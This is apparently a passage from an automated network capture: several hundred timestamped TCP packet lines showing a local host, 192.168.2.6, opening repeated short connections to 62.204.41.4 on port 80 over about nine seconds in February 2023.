                          Feb 7, 2023 20:03:04.340648890 CET5018780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:04.401464939 CET805018762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:04.403584957 CET805018762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:04.403785944 CET5018780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:04.527862072 CET5018780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:04.528753042 CET5018880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:04.588489056 CET805018762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:04.588713884 CET5018780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:04.590168953 CET805018862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:04.590317965 CET5018880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:04.590702057 CET5018880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:04.651911020 CET805018862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:04.655025959 CET805018862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:04.655325890 CET5018880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:04.765811920 CET5018880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:04.768548012 CET5018980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:04.827392101 CET805018862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:04.827631950 CET5018880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:04.831051111 CET805018962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:04.831450939 CET5018980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:04.831774950 CET5018980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:04.894238949 CET805018962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:04.896188974 CET805018962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:04.896327972 CET5018980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:05.018742085 CET5018980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:05.018827915 CET5019080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:05.082053900 CET805019062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:05.082089901 CET805018962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:05.082221031 CET5019080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:05.082353115 CET5018980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:05.082669020 CET5019080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:05.145092010 CET805019062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:05.148695946 CET805019062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:05.148828030 CET5019080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:05.264796972 CET5019080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:05.265619993 CET5019180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:05.326922894 CET805019162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:05.327030897 CET5019180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:05.327162027 CET805019062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:05.327234983 CET5019080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:05.327790976 CET5019180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:05.389182091 CET805019162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:05.391647100 CET805019162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:05.391819000 CET5019180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:05.500425100 CET5019180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:05.503889084 CET5019280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:05.562381029 CET805019162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:05.562551975 CET5019180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:05.564357996 CET805019262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:05.564505100 CET5019280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:05.567548990 CET5019280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:05.629244089 CET805019262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:05.630932093 CET805019262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:05.631066084 CET5019280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:05.754300117 CET5019280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:05.755670071 CET5019380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:05.815519094 CET805019262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:05.815677881 CET5019280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:05.819056988 CET805019362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:05.819447041 CET5019380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:05.833350897 CET5019380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:05.895807028 CET805019362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:05.898107052 CET805019362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:05.898420095 CET5019380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:06.014486074 CET5019480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:06.014672995 CET5019380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:06.074928999 CET805019462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:06.075058937 CET5019480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:06.078732967 CET5019480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:06.078759909 CET805019362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:06.079025984 CET5019380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:06.138273001 CET805019462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:06.141968012 CET805019462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:06.142098904 CET5019480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:06.253983974 CET5019480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:06.254815102 CET5019580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:06.314347029 CET805019462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:06.315155029 CET5019480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:06.316323042 CET805019562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:06.319168091 CET5019580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:06.319605112 CET5019580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:06.383065939 CET805019562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:06.383594036 CET805019562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:06.383728981 CET5019580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:06.499188900 CET5019580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:06.500272989 CET5019680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:06.560780048 CET805019562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:06.561811924 CET805019662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:06.562058926 CET5019580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:06.562069893 CET5019680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:06.562601089 CET5019680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:06.624198914 CET805019662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:06.626566887 CET805019662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:06.627670050 CET5019680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:06.777487993 CET5019680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:06.778261900 CET5019780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:06.839121103 CET805019662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:06.839409113 CET5019680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:06.839582920 CET805019762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:06.839693069 CET5019780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:06.840701103 CET5019780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:06.902420998 CET805019762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:06.904644966 CET805019762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:06.905247927 CET5019780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:07.020131111 CET5019780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:07.021018028 CET5019880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:07.081657887 CET805019762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:07.081964016 CET5019780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:07.082395077 CET805019862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:07.082526922 CET5019880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:07.083062887 CET5019880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:07.144520998 CET805019862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:07.148803949 CET805019862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:07.149034977 CET5019880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:07.263169050 CET5019880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:07.264028072 CET5019980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:07.324747086 CET805019962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:07.324879885 CET805019862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:07.325002909 CET5019980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:07.325136900 CET5019880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:07.326755047 CET5019980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:07.387131929 CET805019962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:07.389992952 CET805019962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:07.390078068 CET5019980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:07.497400045 CET5019980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:07.498279095 CET5020080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:07.558068037 CET805019962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:07.558281898 CET5019980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:07.559474945 CET805020062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:07.559609890 CET5020080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:07.560015917 CET5020080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:07.621819019 CET805020062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:07.623392105 CET805020062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:07.623534918 CET5020080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:07.730825901 CET5020080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:07.732801914 CET5020180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:07.792407990 CET805020062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:07.792529106 CET5020080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:07.795028925 CET805020162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:07.795206070 CET5020180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:07.797560930 CET5020180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:07.860290051 CET805020162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:07.863240004 CET805020162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:07.863529921 CET5020180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:07.965343952 CET5020180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:07.966104984 CET5020280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:08.028105974 CET805020162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:08.028237104 CET5020180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:08.028918028 CET805020262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:08.029040098 CET5020280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:08.029584885 CET5020280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:08.092293024 CET805020262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:08.095988035 CET805020262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:08.096246004 CET5020280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:08.201389074 CET5020280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:08.202511072 CET5020380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:08.264127016 CET805020362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:08.264199018 CET805020262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:08.264318943 CET5020380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:08.264381886 CET5020280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:08.264781952 CET5020380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:08.326153040 CET805020362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:08.329248905 CET805020362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:08.329313993 CET5020380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:08.435224056 CET5020380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:08.436430931 CET5020480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:08.497936010 CET805020362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:08.497991085 CET805020462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:08.498050928 CET5020380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:08.498255968 CET5020480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:08.498528957 CET5020480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:08.560992002 CET805020462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:08.562843084 CET805020462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:08.563095093 CET5020480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:08.673842907 CET5020480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:08.674737930 CET5020580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:08.735717058 CET805020462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:08.735805035 CET5020480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:08.738023996 CET805020562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:08.738114119 CET5020580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:08.738599062 CET5020580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:08.802434921 CET805020562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:08.804395914 CET805020562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:08.804487944 CET5020580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:08.920034885 CET5020580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:08.920723915 CET5020680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:08.982444048 CET805020662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:08.982578039 CET5020680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:08.982630014 CET805020562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:08.982744932 CET5020580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:08.986815929 CET5020680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:09.049566984 CET805020662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:09.053705931 CET805020662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:09.053843021 CET5020680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:09.169995070 CET5020680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:09.171195030 CET5020780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:09.231816053 CET805020662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:09.231933117 CET5020680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:09.234045029 CET805020762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:09.237651110 CET5020780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:09.251394033 CET5020780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:09.314907074 CET805020762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:09.317115068 CET805020762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:09.317215919 CET5020780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:09.435906887 CET5020780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:09.437633991 CET5020880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:09.498903036 CET805020762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:09.499475956 CET5020780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:09.500135899 CET805020862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:09.500344038 CET5020880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:09.500906944 CET5020880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:09.563714027 CET805020862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:09.565390110 CET805020862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:09.565556049 CET5020880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:09.670497894 CET5020880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:09.672249079 CET5020980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:09.733408928 CET805020862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:09.735428095 CET805020962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:09.735517025 CET5020880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:09.735636950 CET5020980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:09.736542940 CET5020980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:09.799094915 CET805020962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:09.801541090 CET805020962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:09.801795006 CET5020980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:09.919078112 CET5020980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:09.919615984 CET5021080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:09.982147932 CET805020962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:09.982180119 CET805021062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:09.982379913 CET5020980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:09.982449055 CET5021080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:09.990258932 CET5021080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:10.053524971 CET805021062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:10.056719065 CET805021062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:10.056968927 CET5021080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:10.171616077 CET5021080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:10.173333883 CET5021180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:10.235048056 CET805021062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:10.235265970 CET5021080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:10.236042976 CET805021162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:10.236191988 CET5021180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:10.237660885 CET5021180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:10.299876928 CET805021162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:10.302833080 CET805021162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:10.302963018 CET5021180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:10.419440031 CET5021180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:10.420219898 CET5021280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:10.481791973 CET805021162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:10.481887102 CET5021180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:10.482362032 CET805021262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:10.482575893 CET5021280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:10.483510971 CET5021280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:10.545780897 CET805021262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:10.548284054 CET805021262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:10.548480988 CET5021280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:10.669056892 CET5021280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:10.669755936 CET5021380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:10.731973886 CET805021362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:10.731985092 CET805021262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:10.732338905 CET5021280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:10.732368946 CET5021380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:10.733288050 CET5021380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:10.795515060 CET805021362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:10.797100067 CET805021362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:10.797250032 CET5021380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:10.909316063 CET5021380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:10.909995079 CET5021480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:10.970985889 CET805021362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:10.971210003 CET805021462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:10.971240997 CET5021380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:10.971380949 CET5021480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:10.972258091 CET5021480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:11.033596039 CET805021462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:11.035756111 CET805021462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:11.035855055 CET5021480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:11.137667894 CET5021480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:11.138988972 CET5021580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:11.199687958 CET805021462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:11.199728012 CET805021562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:11.199830055 CET5021480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:11.199872017 CET5021580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:11.200841904 CET5021580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:11.261485100 CET805021562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:11.265623093 CET805021562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:11.265846014 CET5021580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:11.376221895 CET5021580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:11.377238035 CET5021680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:11.437088966 CET805021562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:11.437288046 CET5021580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:11.438826084 CET805021662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:11.438970089 CET5021680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:11.470014095 CET5021680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:11.531816006 CET805021662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:11.534045935 CET805021662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:11.534164906 CET5021680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:11.640346050 CET5021680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:11.641102076 CET5021780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:11.701914072 CET805021662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:11.702008009 CET5021680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:11.702508926 CET805021762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:11.702647924 CET5021780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:11.704054117 CET5021780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:11.766140938 CET805021762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:11.768791914 CET805021762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:11.768888950 CET5021780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:11.873284101 CET5021780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:11.874033928 CET5021880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:11.935023069 CET805021762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:11.935152054 CET5021780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:11.935468912 CET805021862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:11.935587883 CET5021880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:11.936212063 CET5021880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:11.997595072 CET805021862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:11.999941111 CET805021862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:12.000061989 CET5021880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:12.111618996 CET5021880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:12.116053104 CET5021980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:12.173388958 CET805021862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:12.173613071 CET5021880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:12.178590059 CET805021962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:12.178702116 CET5021980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:12.179096937 CET5021980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:12.241607904 CET805021962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:12.246732950 CET805021962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:12.250766993 CET5021980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:12.379503965 CET5021980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:12.380183935 CET5022080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:12.441778898 CET805022062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:12.442117929 CET5022080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:12.442316055 CET805021962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:12.442395926 CET5021980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:12.442627907 CET5022080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:12.504134893 CET805022062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:12.506438971 CET805022062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:12.510112047 CET5022080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:12.627041101 CET5022080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:12.628104925 CET5022180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:12.687350988 CET805022162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:12.687876940 CET5022180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:12.688306093 CET5022180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:12.688508034 CET805022062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:12.688611984 CET5022080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:12.747531891 CET805022162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:12.750021935 CET805022162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:12.750199080 CET5022180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:12.871860027 CET5022180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:12.872672081 CET5022280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:12.931920052 CET805022162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:12.932714939 CET805022262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:12.932863951 CET5022180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:12.932985067 CET5022280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:12.933465004 CET5022280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:12.993325949 CET805022262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:12.994988918 CET805022262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:12.995146036 CET5022280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:13.106724024 CET5022280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:13.107542038 CET5022380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:13.166085958 CET805022262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:13.166307926 CET5022280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:13.167072058 CET805022362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:13.167221069 CET5022380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:13.167789936 CET5022380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:13.227356911 CET805022362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:13.231307030 CET805022362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:13.231405973 CET5022380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:13.343261003 CET5022380192.168.2.662.204.41.4
